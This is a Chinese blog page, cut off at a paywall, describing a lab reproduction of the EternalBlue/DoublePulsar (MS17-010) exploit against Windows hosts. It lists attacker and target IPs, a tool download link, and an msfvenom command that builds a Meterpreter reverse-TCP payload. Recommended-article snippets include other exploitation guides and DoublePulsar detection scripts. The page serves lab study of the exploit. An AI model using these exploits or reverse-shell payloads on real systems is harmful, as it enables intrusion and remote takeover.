E+D:eternalblue+Doublepulsar

最新推荐文章于 2024-08-24 10:13:24 发布
原创 最新推荐文章于 2024-08-24 10:13:24 发布 · 994 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文档详细介绍了如何使用Eternalblue和Doublepulsar工具对Windows主机进行SMB和RDP协议攻击。通过设置攻击机和靶机的IP地址、端口,生成恶意DLL文件,并在pentestbox环境中执行脚本,最终实现远程控制。实验过程中,成功获得了system权限,但Windows Server 2003系统未受影响。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机:192.168.6.39(windows server 2008 与windows 7测试过,没有问题)

攻击机:192.168.6.42

参考链接

http://www.duorenwei.com/news/5316.html

https://www.t00ls.net/viewthread.php?tid=39343&highlight=%E6%96%B9%E7%A8%8B%E5%BC%8F

工具的下载地址:http://pan.baidu.com/s/1dEYJQaH   密码:v5cj

 

 

利用说明:

本次实验首先执行脚本攻击,对目标IP、端口、系统版本等进行设置,接下来生成恶意的dll文件,并使用脚本加载它,最终达到实验目的。

 

主要是针对windows主机的SMB、RDP协议进行攻击,因为我主要根据他们提供的payload的程序,利用这两个模块eternalblue和Doublepulsar可以对攻击smb和rdp协议

 

在pentestbox下运行

1、实现交互端口

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.6.42

最低0.47元/天 解锁文章

200万优质内容无限畅学
【漏洞利用】使用永恒之蓝的双倍脉冲模块(Eternalblue_doublepulsar)渗透攻击Win_7 32位主机
ATree的博客
12-20 1万+
使用这个模块本来是用来做攻击测试的,但是我始终没有测试成功,我大概花了1天半的时间,一直在研究为什么网上的文章里都显示测试成功了,我的就没有成功,一直在找原因,因为除了时间上的差异,kali模块增多,高版本的wine32软件,我真的不知道到底问题出在哪里了,就真的只好从这些方面入手去排查,从问题出发找原因,这个真的需要耐心,毅力。 我写的详细些,大家也就看的明白,这样就能保证你一次成功的概率比较...
永恒之蓝(EternalBlue)漏洞利用实例
热门推荐
桂华流瓦的别致小院
05-15 1万+
1、升级kali-rolling a、修改更新源 vim /etc/apt/sources.list,只保留官方更新源“deb http://http.kali.org/kali kali-rolling main non-free contrib”将其他更新源注释掉; b、更新 apt-get update && apt-get upgrade 2、安装wine32 root@kali:
eternalblue_doublepulsar
11-25
这才是最纯正的eternalblue_doublepulsar!!!!!!!
Eternalblue-Doublepulsar-Metasploit-master
05-11
Eternalblue-Doublepulsar-Metasploit-master
MS17-010永恒之蓝漏洞利用(windows7 32位)
逍遥小哥的博客
01-11 1192
第二步:把Eternalblue-Doublepulsar-Metasploit文件中的eternalblue_doublepulsar.rb 拷贝到/usr/share/metasploit-framework/modules/exploits/windows/smb。sudo dpkg --add-architecture i386 (开启 32 位架构支持)sudo apt install --install-recommends wine 安装。然后安装win 32架构。接下来开始用msf来打。
msf初体验——xp的ms08-067漏洞
boom_99的博客
09-07 3388
msf初体验——xp的ms08-067漏洞 环境: kali2019:192.168.1.128 xp32位:192.168.1.129 都是nat模式 扫描靶机漏洞 1.nmap扫描(不知道目标漏洞名称),个人感觉有点慢,应该是配置太垃圾 nmap --script=vuln 192.168.1.129 nmap扫描报告,扫到两个,ms08-067和ms17-010 Nmap scan report for 192.168.1.129 Host is up (0.00053s.
永恒之蓝(勒索病毒)复现与利用
qq_38348692的博客
08-08 3470
整个的复现的过程需要的环境以及工具有: kali 2.0:用来监听获取反弹的shell。ip:192.168.15.174 winsever 2003 :需要装上python环境,勒索病毒攻击机。ip:192.168.15.141 win2007 :靶机,确保445端口开启。ip:192.168.15.144 永恒之蓝 python2.6已经在winsever下装python需...
利用NSA的MS17-010漏洞利用工具攻击Windows7
小晓晓晓林的博客
02-07 1916
0x01 Download NSA工具包 NSA工具包下载 攻击脚本需要32位的Python2.6环境,所以攻击机还需以下两个环境: python-2.6.6.msi、pywin32-221.win32-py2.6.exe 0x02 修改NSA工具配置文件 修改C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py文件 注释掉第72行代码#addplugins(fb, "ListeningPost", LP_DIR, .
方式程0day MS17-010远程溢出漏洞测试
十年磨一剑,霜刃未曾试!
06-02 1万+
最近那个WannaCry勒索病毒搞的沸沸扬扬,据了解该病毒利用了方程式泄露的0day MS17-010(永恒之蓝)进行传播。 据说这个漏洞是支持winxp-win2012,测试一下这个漏洞到底如何。 一、环境: 靶机:win7 IP:192.168.4.247 攻击机:win2003 IP:192.168.4.16 反弹shell: kali IP:192.168.4.15 在攻击机中需要p...
NSA泄露的恶意软件DoublePulsar感染了数万台Windows电脑
weixin_33730836的博客
09-19 1060
本文讲的是NSA泄露的恶意软件DoublePulsar感染了数万台Windows电脑, 安全研究人员认为,世界各地的脚本小子和在线犯罪分子正在利用Shadow Brokers 黑客组织上周泄露的NSA黑客工具,致使全球数十万台Windows计算机正面临网络攻击威胁。 上周,被称为“Shadow Brokers”的神秘黑客组织泄露了一套据称是属于NSA“...
doublepulsar-detection-script脚本:用于扫描网络以查找受DOUBLEPULSAR植入物危害的Windows系统的python2脚本
02-20
作者:卢克·詹宁斯( @countercept.com-@jukelennings) 公司:Countercept(@countercept) 网站: : 一组python2脚本,用于清除影子代理发布的DOUBLEPULSAR植入物的SMB和RDP版本的IP列表。 支持单线程IP检查,并支持多线程文件中的IP列表。 SMB版本还支持对植入物进行远程卸载以进行补救,这是通过了解@ zerosum0x0反转的操作码机制而获得的。 这是一个较早发布的版本,其目的是允许人们在网络上找到折衷方案,因为这些漏洞在无处不在,并且毫无疑问地被用于针对组织。 它重新实现植入物的ping命令,可以在不进行身份验证的情况下远程使用该命令,以确定系统是否被感染。 支持植入物的SMB和RDP版本。 并非所有操作系统版本都经过测试,并且某些当前无法通过。 例如,2012将拒绝带有ACCESS_DENI
doublepulsar-detection-script-master.zip
09-24
doublepulsar-detection-script-master.zip:doublepulsar后门检测脚本
doublepulsar
03-15
作者:卢克·詹宁斯( @countercept.com-@jukelennings) 公司:Countercept(@countercept) 网站: : 一个python2脚本,用于从PCAP文件中解密DOUBLEPULSAR SMB植入物使用的C2流量。 所使用的加密是一个简单的4字节XOR,您经常会看到它显示在FUZZBUNCH工具集的命令输出中。 这利用了以下事实:在第一个非Ping数据包的SESSION_SETUP参数中存在四个连续的零,这直接揭示了XOR密钥,并且用于对所有流量进行解密。 这是一个较早的发行版,它依赖于在网络数据包中查找某些特定组件,并且已经过DLL注入功能的测试。 为了获得最佳结果,请提供流量中仅包含一个命令的PCAP文件。 出于测试目的,此存储库中包含一个PCAP文件,该文件是使用DLL注入命令捕获的,以将标准Windows DLL wini
eternalblue原理
11-25
关于eternalblue原理的详解,写得详细,对于理解此技术很有帮助
探秘DoublePulsar检测脚本:保障网络安全的新武器
gitblog_00042的博客
04-11 606
探秘DoublePulsar检测脚本:保障网络安全的新武器 doublepulsar-detection-script项目地址:https://gitcode.com/gh_mirrors/dou/doublepulsar-detection-script 项目简介 是一个开源项目,由Countercept团队开发并维护。它的主要目标是帮助网络安全专业人员检测和识别著名的NSA(美国国家安全局)...
Doublepulsar 检测脚本使用教程
最新发布
gitblog_00574的博客
08-24 736
Doublepulsar 检测脚本使用教程 项目介绍 Doublepulsar 检测脚本是一个用于扫描网络中受 DOUBLEPULSAR 植入物感染的 Windows 系统的 Python 脚本。该项目由 Countercept 开发,旨在帮助安全研究人员和网络管理员识别和应对潜在的安全威胁。 项目快速启动 安装依赖 首先,确保你已经安装了 masscan 工具。你可以通过以下命令安装: brew...
双脉冲星(DoublePulsar)检测脚本使用指南
gitblog_00236的博客
08-10 734
双脉冲星(DoublePulsar)检测脚本使用指南 项目介绍 该项目是一个Python 2脚本集合,专门用于扫描网络以发现受DOUBLEPULSAR恶意软件感染的Windows系统。DOUBLEPULSAR是一种著名的后门程序,利用了MS17-010漏洞在系统间传播。该工具由Countercept团队的Luke Jennings开发并维护,其目标是帮助网络安全专业人员快速识别出被该恶意软件侵害的...
解决win7嵌入式系统无法DoublePulsar问题
qq_32660043的博客
01-29 363
渗透过程中总是会遇到千奇百怪的问题,解决问题,并成功控制目标,是我们的首要任务。
EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
m0_73734159的博客
12-26 8865
2017年永恒之蓝漏洞,编号为ms17漏洞。现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值